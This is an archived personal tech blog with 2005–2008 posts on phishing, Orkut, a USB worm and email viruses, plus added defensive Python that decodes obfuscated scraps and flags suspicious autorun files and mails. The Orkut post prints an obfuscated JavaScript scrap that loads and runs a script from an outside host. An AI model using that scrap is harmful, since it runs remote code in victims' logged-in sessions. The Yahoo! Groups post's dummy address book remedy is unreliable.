Archive for the ‘Web/Tech’ Category

Firefox 3 - Irony

Thursday, September 18th, 2008

As you probably know, Firefox 3 has a “feature” to block access to sites that have been reported to be phishing or malware hosts.

Ironically, Mozilla’s own page titled “It’s an attack” has been reported to be an attack site.

Mozilla - Reported Attack Site

Update: I stand corrected. Mozilla’s own page confirms that it is a test page for verifying that its phishing and malware protection is working correctly.

Microsoft Spoof

Wednesday, February 6th, 2008

I received a mail today purported to be from Microsoft updates. The mail was just this:

URGENT: Please intall critical Windows XP/2000/2003/Vista update!

Urgent Install Get critical update (obligatory)

Concerned about privacy? When you check for updates, basic information about your computer, not you, is used to determine which updates your programs need. To learn more, see our privacy statement.

Now, the only link present in the original e-mail was the “Get critical update (obligatory)” one. No link to the privacy statement. No link to a Microsoft Security Advisory, nothing. And that link was to another site designed to look exactly like the Microsoft Update website.

The scary thing is that this kind of e-mail is very effective. Most people who have no idea what is going on would just click on the button, resulting in an installation that would bring in viruses, Trojans, spyware, malware, etcetera, etcetera, etcetera.

That’s why there are warnings all over the place. Don’t click on any link in e-mail messages, even if you believe the message to be genuine.

(Or better yet, use Linux)

Orkut Scripts

Thursday, January 31st, 2008

Of late, I’ve been getting a lot of scraps in orkut like “Paste this text into your address bar. Don’t worry it’s harmless…”

The latest is a pretty interesting one…

javascript:eval(String.fromCharCode(100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 99, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 100, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 99, 41, 59, 99, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 99, 111, 111, 108, 112, 99, 115, 116, 117, 102, 102, 46, 103, 111, 111, 103, 108, 101, 112, 97, 103, 101, 115, 46, 99, 111, 109, 47, 114, 111, 100, 114, 105, 103, 111, 46, 117, 115, 101, 114, 46, 106, 115, 39, 59, 118, 111, 105, 100, 40, 48, 41))

The eval function of JavaScript takes a string and executes it as if it were JavaScript code. The String.fromCharCode function takes a series of numbers and converts them into the corresponding ASCII characters.

A simple one line C program reveals the string behind the integers (line breaks added for easy understanding):

d=document;
c=d.createElement('script');
d.body.appendChild(c);
c.src='http://coolpcstuff.googlepages.com/rodrigo.user.js';
void(0)

This is a pretty simple bit of code that appends the script located at the address shown above to the current document and executes it. Now, when I tried to get the script from the site, I got the message: This site has been disabled for violations of our Program Policies.
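Decoding the numbers by hand (or with eval) is exactly what one should not have to do, so here is an added example, not code from the post, that rebuilds the string from a String.fromCharCode scrap without executing it and reports what the decoded code would do. The scrap is the one quoted above; the function names are this example’s own.

```python
import re
from urllib.parse import urlparse

# The scrap quoted in the post, kept verbatim so the decoder has real input.
SCRAP = ("javascript:eval(String.fromCharCode("
         "100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 99, 61, 100, 46, 99, 114, 101, 97, 116, 101, "
         "69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 100, 46, 98, "
         "111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 99, 41, 59, 99, 46, "
         "115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 99, 111, 111, 108, 112, 99, 115, 116, 117, "
         "102, 102, 46, 103, 111, 111, 103, 108, 101, 112, 97, 103, 101, 115, 46, 99, 111, 109, 47, 114, "
         "111, 100, 114, 105, 103, 111, 46, 117, 115, 101, 114, 46, 106, 115, 39, 59, 118, 111, 105, 100, "
         "40, 48, 41))")

FROMCHARCODE = re.compile(r"String\.fromCharCode\(([^)]*)\)")


def decode_from_char_code(scrap):
    """Rebuild the string the browser would have eval'd. Nothing is executed."""
    m = FROMCHARCODE.search(scrap)
    if not m:
        return None
    codes = [c.strip() for c in m.group(1).split(",") if c.strip()]
    if not all(c.isdigit() for c in codes):
        return None
    return "".join(chr(int(c)) for c in codes)


def inspect_decoded(code):
    """Static checks worth answering before pasting anything into the address bar."""
    urls = re.findall(r"""https?://[^'"\s]+""", code)
    return {
        "injects_script": bool(re.search(r"""createElement\(\s*['"]script['"]\s*\)""", code)),
        "sets_src": bool(re.search(r"\.src\s*=", code)),      # loads code from elsewhere
        "nested_eval": bool(re.search(r"\beval\s*\(", code)),  # a second obfuscation layer
        "hosts": [urlparse(u).hostname for u in urls],         # where that code comes from
    }


def analyse_scrap(scrap):
    code = decode_from_char_code(scrap)
    return None if code is None else {"code": code, "report": inspect_decoded(code)}


if __name__ == "__main__":
    import json
    print(json.dumps(analyse_scrap(SCRAP), indent=2))
```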

A quick Google search for the script file name turned up reports that the script simply floods your friends’ scrapbooks with the same message. Apparently harmless. The key word is apparently.

Now, I have a healthy dose of paranoia. I don’t trust any of these scripts unless I write them myself, or at least examine them myself. Now, I have tried to access some of the scripts directly (which should return the script source code without executing it), but the site gives me a permission denied (reason: hotlinking forbidden). That gives me all the more reason to suspect something is amiss.

I still don’t get why people jump on scripts like this, when the orkut home page warns (or at least used to) against running any script while logged into orkut. So, I’ll put out a simple security advisory.

Don’t run any script while logged into orkut (or for that matter, any website), no matter what it claims to do. For instance, one malicious script could always steal your personal information, even if you have hidden it from your friends. If a script can read your friends list, it can read anything.

VBS/Butsur Worm

Sunday, April 8th, 2007

It so happened that my portable hard disk got infected with this script worm for Windows. The worm itself is, in my not so humble opinion, relatively harmless: not really dangerous, just a real pain in the neck. Double-clicking on drives will not open them. Instead, you will have to right-click on the drive and select Open. You will also see an Autoplay option when you right-click the drive.

The worm is just a simple VBScript file, which when run, copies itself to the Windows folder as well as to the root folder of all available drives. In addition, it creates a file autorun.inf that causes the script to be executed whenever the drive icon is double-clicked.

Removing the worm isn’t really that hard. However, you need to be patient: if you accidentally double-click even one drive, you’ll have to redo the entire procedure from the start. The steps to remove the worm are as follows. It might also help to reboot into Safe Mode and log in as an administrator.

  1. Go to the task manager by pressing Ctrl+Alt+Delete or Ctrl+Shift+Esc
  2. Go to the processes tab and stop all wscript.exe processes.
  3. Open Windows Explorer and go to Tools > Folder Options.
  4. In Folder Options, uncheck the following options:
    1. Hide extensions for known file types
    2. Hide protected operating system files

    Also ensure that Show hidden files and folders option is selected and press apply.

  5. Go to the registry editor by typing regedit in the Run window
  6. Go to the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
  7. There should be a key called MS32DLL or something to that effect. The value for that should be C:\Windows\MS32DLL.dll.vbs. This file name can change depending on what your Windows path is and what variant of the worm you have. However, the different versions of the worm that I have seen all install themselves in the registry, and this will help you in removing the worm. Anyway, note the name and check that there is a file with the same name in the root of C:\.
  8. Delete this file as well as autorun.inf from your C: drive as well as all other drives. Be careful not to double click on any drive to go to it as you’ll have to start deleting the files from the beginning.
  9. Delete the file from your Windows folder.
  10. Delete the offending key from the registry.
  11. Some variants, maybe even all, modify the title bar of Internet Explorer to show the title of the web page, followed by the text “Hacked by Godzilla” or “Hacked by Moozilla” or something else, again depending on the variant. This isn’t really a problem, but if you want the original text back, go to the registry entry at HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main. The key to be modified here is WindowTitle (I think). IE7 doesn’t seem to have an entry here, so I’m not too sure about the actual key text. Anyway, just change it to whatever you want; the default is “Microsoft Internet Explorer”.
  12. Restart the computer and check all drives to make sure that the Autoplay entry is no longer there on the right-click menu.
  13. Congratulations. You have deleted your first worm.

Update: This worm and a host of other malware are now being created specifically to infect systems using removable media, typically USB flash disks. Inserting these disks usually causes Windows to execute the autorun scripts, if any. The autorun function can be bypassed by holding down the Shift key while inserting the disk. The Shift key needs to be held down for a few seconds until Windows can recognize the drive and add it to the list of drives in My Computer. This simple step should curtail the spread of such malware.
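Since the whole trick, both on the hard disk and on USB sticks, rests on an autorun.inf that points at the script, it is worth being able to read one before deleting it. The following is an added example (not part of the post, and not the worm’s real file): a small autorun.inf parser that lists what a double-click would launch. The two samples are constructed; the worm-like one only reuses the MS32DLL.dll.vbs name mentioned above.

```python
import re
from pathlib import PureWindowsPath

# Constructed samples. The first mimics the pattern the post describes (a script
# hooked into the drive's default action and a custom verb); the second is a
# harmless autorun.inf that only sets an icon and a label.
SAMPLE_WORM = """[autorun]
shellexecute=wscript.exe MS32DLL.dll.vbs
shell\\Open\\command=wscript.exe MS32DLL.dll.vbs
shell=Open
"""
SAMPLE_BENIGN = """[autorun]
icon=setup.exe,0
label=Backup Disk
"""

SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd", ".exe", ".scr", ".pif", ".com"}
LAUNCH_KEYS = {"open", "shellexecute"}                      # run on AutoPlay / double-click
VERB_CMD = re.compile(r"^shell\\([^\\]+)\\command$", re.IGNORECASE)  # shell\<verb>\command


def parse_autorun(text):
    """Return {section: [(key, value), ...]}; autorun.inf is INI-style."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, [])
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current].append((key.strip(), value.strip()))
    return sections


def launched_files(command):
    """Tokens of a command line that name a script or executable."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command)]
    return [t for t in tokens if PureWindowsPath(t).suffix.lower() in SCRIPT_EXTS]


def inspect_autorun(text):
    """List what an autorun.inf would launch, or which verb it redirects double-click to."""
    findings = []
    for key, value in parse_autorun(text).get("autorun", []):
        verb = VERB_CMD.match(key)
        if key.lower() in LAUNCH_KEYS or verb:
            where = f"verb '{verb.group(1)}'" if verb else "default action"
            findings += [f"{key} ({where}) launches {f}" for f in launched_files(value)]
        elif key.lower() == "shell":
            findings.append(f"shell= redirects double-click to verb '{value}'")
    return findings


if __name__ == "__main__":
    for name, text in (("worm-like", SAMPLE_WORM), ("benign", SAMPLE_BENIGN)):
        print(name, inspect_autorun(text) or ["nothing launched"])
```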

MySpace and GoDaddy shut down site

Saturday, January 27th, 2007

From /.: MySpace and GoDaddy shut down security site

From the article, apparently, a bunch of MySpace usernames and passwords were archived on Seclists.org. This information was already available on several sites and seclists.org simply mirrored the information. 1 page out of 250,000. So MySpace contacted GoDaddy directly and they suspended the domain.

WTF??? This stinks of dictatorship… I repeat what several others have already said: follow these 3 steps, in order.

  1. Contact the site owner and inform him/her of the offending content.
  2. If that fails, then contact the hosting provider.
  3. If that also fails, then, and only then, contact the registrar to suspend the domain.

So, taking this to the extreme, somebody posts a link to something interesting (I’ll let your imagination define ’something interesting’), which is a problem to somebody else. So this somebody else contacts GoDaddy and tells them to pull the plug on my website. Man, I’m glad I transferred away from GoDaddy (for a different purpose).

Of Scams And Money Transfers

Thursday, January 18th, 2007

These guys are getting smarter, or so they want us to think. Till a few weeks back, they wanted your help to transfer some money out of the country because of some illegal activities by some company. Now, they want you to transfer the money so that it goes to charity because the holder is not likely to live that long.

Now, seriously, GIVE ME A BREAK!!!!

One, this guy from Tunisia has been able to scrounge up $33 million in just 14 years. Two, his sick wife is likely to die within the next 6 months and so wants me (a trustworthy, honest individual, as described in the mail) to distribute the money to charity, with 30% as my commission.

Why do I find this mail a little hard to believe?

This Gazzag Thing…

Saturday, November 4th, 2006

I’m pretty sure that the entire blogging community (well, at least those on orkut) would have received invitations to join a new social networking site called Gazzag. Soon after he signed up on Gazzag, Ferrari sent a followup mail through orkut. What concerned me was that Gazzag asked the user for his/her orkut login and password, apparently to send invitations to all friends on orkut.

Now, I have a couple of points to chew on.

  1. Why should Gazzag, a competitor for orkut, ask for the orkut login details? What guarantee is there that Gazzag would not hack the account? Not only that, since orkut is most probably linked to your google/gmail account, how can I be sure that Gazzag is not reading my e-mail or posting to Google Groups using my account?
  2. Gazzag has a small mention that you can opt out of receiving the invitations by clicking a link in the invitation e-mail. I can count 5 links in each Gazzag invitation that I’ve received - 1 is a mailto link with the e-mail address of the person who has sent me the invite. The remaining 4 are all “Accept this invitation” style links. Now where did I put that opt-out link?

Call me paranoid, but I like to keep some semblance of my privacy intact. What do you think?

Orkut Reloaded…

Friday, October 20th, 2006

Looks like Google have done a major revamp of Orkut…

First on the list, the ability to sign up, without an invitation from an existing orkut user.

Second, at least what I have noticed, is the ability to reply to a scrap from your own scrapbook. Now you don’t need to go to the other person’s scrapbook to type your reply. Just click on the reply link and a textbox opens to type your scrap. On pressing submit, AJAX works in the background and sends your scrap to the orkut server. And, ta-dah! Your scrap has been added in the other person’s scrapbook without you leaving yours. (AN: I used to do this with a Firefox add-on before orkut was revamped the last time)

Third, I just saw this, the ability to block friend requests from people who don’t speak your language. Hmm, is this a feature or a bug? Open question…

CIA Personality Quiz

Monday, October 2nd, 2006

According to the CIA, I’m a Thoughtful Observer…

Take the CIA Personality Quiz, and see for yourself, what sort of a person you are…

Chennai Reloaded

Tuesday, June 20th, 2006

Looks like Google Earth has been updated with wider coverage of Chennai and the surrounding areas. For example, take a look at the aerial view of SSN College of Engineering, located about 30 km south of Tidel Park on Old Mahabalipuram Road.

Google Earth view of SSN

SSN College of Engineering

New Vow Taken

Thursday, March 16th, 2006

One man is about to do the unthinkable…

Like Sudhish did quite some time back, I’m taking a new vow now.

GMail for your domain

Sunday, February 12th, 2006

Google is looking for organizations to beta test their new GMail for domains. As a GMail user, I’d love to have something like this on my domain, but I guess they wouldn’t really accept my application to beta test it. (Besides, I really don’t have the time to test it…). But I’d love it when it comes out in production.

Read the original Slashdot story.

Virus in Yahoo! Groups

Monday, January 30th, 2006

By now, you are probably aware that a virus has struck the Yahoo! Groups. This virus is fairly intelligent for two reasons.

  1. It searches the address book and the inbox for the word “group” and sends fake mails to that group.
  2. The fake mails have a subject which is very similar to a previous thread in the group.

This particular virus has one distinguishing feature: all the virus-generated mails have a mail size of around 180K to 190K. Secondly, virus-generated mail in general, not just from this virus, has a major distinguishing feature: the From column in Yahoo will display the mail ID, not the actual name of the person as configured.

I received some suggestions in the mail as to how to combat the spread of this virus (or for that matter, any generic virus).

  1. Create an address entry with the name “!0000” with no e-mail address
  2. Create an address entry with just the e-mail address “aaa@aaa.com”
  3. Create an address entry with just the e-mail address “aaabbbcccdddnothing@yahoogroups.com”

Hopefully, with the above addresses in place (they should be the first 3 entries in the address book), the spread of the virus can be stopped.

You can also prevent getting infected by a virus. Avoid opening any attachment if you don’t know the sender or you are not expecting it. Just looking at the From field is usually sufficient: if you see only the sender’s ID and not their name, select and delete.

Good luck!

Update: If you have admin access to your group, you can also disable attachments from being sent to group members, thus avoiding the spread of the virus. You can even go the additional step and block all messages totally, without deleting the group altogether.
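The traits listed above (bare address in the From column, 180K-190K size, a subject that replays an existing thread, and the attachment the update talks about) make a usable triage rule. The following is an added example, not code from the post; the two mails and the thread list are constructed, and the function names are this example’s own.

```python
import re
from email import message_from_string, policy
from email.utils import parseaddr

# Constructed sample mails, not real captures. SUSPECT carries the traits the
# post describes: a bare address in From, a "Re:" of an existing thread subject,
# and an attachment that puts the whole mail in the 180K-190K band.
KNOWN_THREADS = ["Meeting on Friday"]
NORMAL = ("From: Alice Example <alice@example.com>\nTo: mygroup@yahoogroups.com\n"
          "Subject: Meeting on Friday\nContent-Type: text/plain\n\nSee you there.\n")
SUSPECT = ("From: alice@example.com\nTo: mygroup@yahoogroups.com\n"
           "Subject: Re: Meeting on Friday\nMIME-Version: 1.0\n"
           'Content-Type: multipart/mixed; boundary="b1"\n\n'
           "--b1\nContent-Type: text/plain\n\nPlease see attached.\n"
           '--b1\nContent-Type: application/octet-stream; name="photo.zip"\n'
           'Content-Disposition: attachment; filename="photo.zip"\n'
           "Content-Transfer-Encoding: base64\n\n" + "QUJD" * 46_000 + "\n--b1--\n")


def thread_key(subject):
    """Subject with any Re:/Fwd: prefixes removed, lower-cased for comparison."""
    return re.sub(r"^\s*((re|fwd?)\s*:\s*)+", "", subject, flags=re.I).strip().lower()


def triage(raw, known_subjects):
    """Reasons a group mail looks worm-generated; an empty list means clean."""
    msg = message_from_string(raw, policy=policy.default)
    name, _addr = parseaddr(msg.get("From", ""))
    subject = str(msg.get("Subject", ""))
    size = len(raw.encode())
    reasons = []
    if not name:                                   # Yahoo would show only the mail ID
        reasons.append("From shows a bare address, no display name")
    if 180_000 <= size <= 190_000:
        reasons.append(f"size {size} bytes, inside the 180K-190K band")
    if thread_key(subject) != subject.lower() and thread_key(subject) in {s.lower() for s in known_subjects}:
        reasons.append("subject is a reply to an existing thread")
    names = [p.get_filename() or "(unnamed)" for p in msg.iter_attachments()]
    if names:
        reasons.append("carries attachment(s): " + ", ".join(names))
    return reasons


def is_suspicious(raw, known_subjects):
    """One trait alone is common in legitimate mail; two or more together are not."""
    return len(triage(raw, known_subjects)) >= 2


if __name__ == "__main__":
    for label, raw in (("normal", NORMAL), ("suspect", SUSPECT)):
        print(label, is_suspicious(raw, KNOWN_THREADS), triage(raw, KNOWN_THREADS))
```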

Laptop Troubles, part 2.0

Thursday, December 29th, 2005

Two things. One, I’ve given my laptop to IBM for servicing and should probably get an estimate on it by tomorrow.

Two, I’ve installed WordPress 2.0 on this blog. The main blog won’t look any different, but the admin section is just way too cool.

Wordpress 2.0 out soon

Thursday, December 22nd, 2005

Wordpress 2.0 is getting released soon. As per the official page, the release candidate is available for download. I’m waiting eagerly for the final to come out so that I can start upgrading. Can’t wait to see what’s under the hood for this release…